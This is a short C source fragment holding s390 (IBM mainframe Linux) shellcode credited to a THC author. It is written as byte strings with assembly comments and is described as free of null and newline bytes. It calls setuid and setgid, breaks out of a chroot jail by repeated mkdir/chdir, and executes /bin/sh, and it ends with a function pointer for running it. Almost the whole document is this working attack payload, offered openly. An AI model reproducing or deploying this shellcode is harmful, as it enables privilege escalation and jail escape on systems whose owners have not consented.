1 /*----------------------------------------------------------------------*/
2 /* s390 shellcode 0x0a / 0x0 free */
3 /* setuid / setgid / chroot break */
4 /* code jcyberpunk@thehackerschoice.com */
5 /*----------------------------------------------------------------------*/
7 "\x0d\x10" /* basr %r1,0 */
8 "\x41\x90\x10\x98" /* la %r9,152(%r1) */
9 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
10 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
11 "\x1a\x6a" /* ar %r6,%r10 */
12 "\x42\x60\x10\x98" /* stc %r6,152(%r1) */
13 "\x17\x22" /* xr %r2,%r2 */
14 "\x42\x20\x10\x9f" /* stc %r2,159(%r1) */
15 "\x0d\xe9" /* basr %r14,%r9 */
16 "\xa7\x68\x04\x7a" /* lhi %r6,1146 */
17 "\x1a\x6a" /* ar %r6,%r10 */
18 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
19 "\x0d\xe9" /* basr %r14,%r9 */
20 "\x41\x20\x10\x9c" /* la %r2,156(%r1) */
21 "\x17\x33" /* xr %r3,%r3 */
22 "\xa7\x68\x04\x73" /* lhi %r6,1139 */
23 "\x1a\x6a" /* ar %r6,%r10 */
24 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
25 "\x0d\xe9" /* basr %r14,%r9 */
26 "\x41\x20\x10\x9c" /* la %r2,156(%r1) */
27 "\xa7\x68\x04\x89" /* lhi %r6,1161 */
28 "\x1a\x6a" /* ar %r6,%r10 */
29 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
30 "\x0d\xe9" /* basr %r14,%r9 */
31 "\xa7\xb8\x05\x39" /* lhi %r11,1337 */
32 "\x1a\xba" /* ar %r11,%r10 */
33 "\xa7\x68\x04\x58" /* lhi %r6,1112 */
34 "\x1a\x6a" /* ar %r6,%r10 */
35 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
36 "\x41\x20\x10\x9d" /* la %r2,157(%r1) */
37 "\x0d\xe9" /* basr %r14,%r9 */
38 "\x46\xb0\x10\x58" /* bct %r11,88(%r1) */
39 "\x41\x20\x10\x9e" /* la %r2,158(%r1) */
40 "\xa7\x68\x04\x89" /* lhi %r6,1161 */
41 "\x1a\x6a" /* ar %r6,%r10 */
42 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
43 "\x0d\xe9" /* basr %r14,%r9 */
44 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
45 "\x1a\x6a" /* ar %r6,%r10 */
46 "\x42\x60\x10\x99" /* stc %r6,153(%r1) */
47 "\x41\x20\x10\xa0" /* la %r2,160(%r1) */
48 "\x50\x20\x10\xa8" /* st %r2,168(%r1) */
49 "\x41\x30\x10\xa8" /* la %r3,168(%r1) */
50 "\x17\x44" /* xr %r4,%r4 */
51 "\x42\x40\x10\xa7" /* stc %r4,167(%r1) */
52 "\x50\x40\x10\xac" /* st %r4,172(%r1) */
53 "\x41\x40\x10\xac" /* la %r4,172(%r1) */
54 "\x0d\xe9" /* basr %r14,%r9 */
55 "\x0b\x17" /* svc 23 <--- after modification */
56 "\x07\xfe" /* br %r14 */
57 "\x41\x2e\x2e\x5c" /* A.. <---- used for mkdir,chroot,chdir */
58 "\x2f\x62\x69\x6e" /* /bin */
59 "\x2f\x73\x68\x5c"; /* /sh\\ */
63 void (*z)()=(void*)shellcode;